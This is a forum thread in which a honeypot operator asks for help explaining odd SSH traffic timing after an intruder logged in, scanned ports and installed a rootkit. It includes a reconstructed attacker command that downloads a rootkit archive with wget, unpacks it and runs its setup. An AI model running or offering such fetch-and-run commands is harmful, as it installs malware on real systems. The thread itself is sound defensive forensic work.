Need help analyzing SSH activity

Quick question how are you determining that outbound data originates from SSh ? If it is on source/destination port - perhaps it is a portscanner looking for other SSh enabled clients to attack or a process looking to find a client on SSh and getting no responses ( misconfigured dial-home ? ) ?

Just an idea.

( P.S. Like the graph - we should have more of those on the forum 😉 )

Quick question how are you determining that outbound data originates from SSh ? If it is on source/destination port - perhaps it is a portscanner looking for other SSh enabled clients to attack or a process looking to find a client on SSh and getting no responses ( misconfigured dial-home ? ) ?

Just an idea.

( P.S. Like the graph - we should have more of those on the forum 😉 )

Thanks… The bars represent inbound/outbound SSH application bytes from a connection the attacker used to login to the honeypot after guessing the password. I just filtered out that session based on IPs and ports like you said.

Yeah, you can't tell from that chart alone, but the first red point is the attacker downloading his toolkit over HTTP. The first blue point is the port scanner that was run. The second red point is a port sweep for TCP port 10000, etc.. I put that data in an HTML table after the chart is done to give those details.

I just can't figure out why there isn't inbound data at 192400. I don't yet have a lot of experience with this, but I'm sure there is an explanation.

Edit–

BTW, I'm not sure if it matters, but the third red point at 192400 was the root kit that was downloaded. The actual wget command used to download it happened at 192050. The reason for the delay was because the second red point was a port scan and the firewall that was throttling TCP connection requests wouldn't allow any more TCP connections for a while.

Do you see TCP based traffic at that time in your pcap? It isn't UDP per chance is it?

As this is a honeypot, is there any chance we could get hold of everything to work with ?

Without that, I wonder if it might be caused by the use of netcat, conceivably if it is pumping out preformed packets it could be spoofing source IP, thus any return traffic would go somewhere else ?

Hey guys,

After checking the pcap, it's definitely SSH and not spoofed IPs. The pcap filter used is below… I'm pretty sure that part is correct and despite there being a lot of network activity in the chart, it's more of a host based forensics question, which is my weak area. I'm not sure what the attacker could of done that would cause commands to be run with no apparent input sent at that time. I checked some of the scripts the attacker ran at 192008 to see if sleep was used, but that wasn't able to explain it.

The pcap filter
(tcp and host $int_ip and host $ext_ip and tcp port $port) or (src host $int_ip and tcp[13] = 2)
Sorry, but I don't think I can give out the pcap. Some of it contains information used to login to compromised hosts. However, when my report is finally done, I would like for someone to give some feedback on it.

I may of just figured it out! I've thought about this some more and does anyone think this is a reasonable explanation? Since the wget command happened at 192050 and because of SYN throttling by the firewall, the actual HTTP request to download the rootkit happened at 192400 and then the rootkit was immediately installed and malicious files accessed, maybe all of the commands were chained?

192050
# wget domain.com/rootkit.tar.gz && tar -xzvf rootkit.tar.gz && cd ./rk && ./setup password && /root/.maldir/start

How do you guys try to explain anomalies like this in your report when you may never be sure if you're right or not?